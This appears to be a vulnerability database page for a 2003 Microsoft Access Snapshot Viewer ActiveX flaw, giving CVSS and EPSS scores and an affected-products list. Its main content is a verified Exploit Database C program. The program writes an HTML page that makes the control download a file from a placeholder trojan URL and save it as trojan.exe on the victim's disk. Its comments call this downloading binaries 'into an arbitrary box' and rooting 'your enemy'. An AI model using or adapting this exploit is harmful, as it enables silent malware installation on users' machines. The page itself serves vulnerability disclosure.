Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 23095
Publication date : 2003-09-02 22h00 +00:00
Author : Oliver Lavery
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/8536/info
Microsoft Access Snapshot Viewer is prone to a remote buffer-overflow condition because the software fails to perform sufficient boundary checks on user-supplied parameters. Presumably, a remote attacker may be able to leverage this issue to execute arbitrary code in the context of the user running the affected Internet Explorer.
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
Download nice binaries into an arbitrary box
Vulnerability discovered by Oliver Lavery
https://www.securityfocus.com/bid/8536/info
Remote: Yes
greetz to str0ke */
#include <stdio.h>
#include <stdlib.h>
#define Filename "Ms-Access-SnapShot.html"
FILE *File;
char data[] =
"<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attaque'></object>\n"
"<script language='javascript'>\nvar arbitrary_file =
'http://path_to_trojan'\n"
"var dest =
'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath =
arbitrary_file\n"
"attack.CompressedPath =
destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
"<script>\n<html>";
int main ()
{
printf("**Microsoft Access Snapshot Viewer ActiveX
Exploit**\n");
printf("**c0ded by callAX**\n");
printf("**r00t your enemy .| **");
FILE *File;
char *b0fer;
if ( (File = fopen(Filename,"w+b")) == NULL ) {
printf("\n fopen() error");
exit(1);
}
b0fer = (char*)malloc(strlen(data));
memcpy(b0fer,data,sizeof(data)-1);
fwrite(b0fer, strlen(data), 1,File);
fclose(File);
printf("\n\n" Filename " has been created.\n");
return 0;
}
Products Mentioned
Configuraton 0
Microsoft>>Access >> Version 97
Microsoft>>Access >> Version 2000
Microsoft>>Access >> Version 2000
Microsoft>>Access >> Version 2000
Microsoft>>Access >> Version 2000
Microsoft>>Access >> Version 2002
Microsoft>>Access >> Version 2002
Microsoft>>Access >> Version 2002
References